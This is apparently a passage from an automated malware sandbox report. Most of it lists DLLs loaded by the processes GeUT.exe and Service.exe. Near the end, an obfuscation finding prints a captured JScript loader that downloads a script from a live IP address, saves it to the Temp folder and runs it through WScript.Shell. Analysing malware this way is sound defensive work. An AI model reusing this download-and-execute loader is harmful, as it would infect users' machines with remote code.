              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              JScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");_Stream.Close();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", 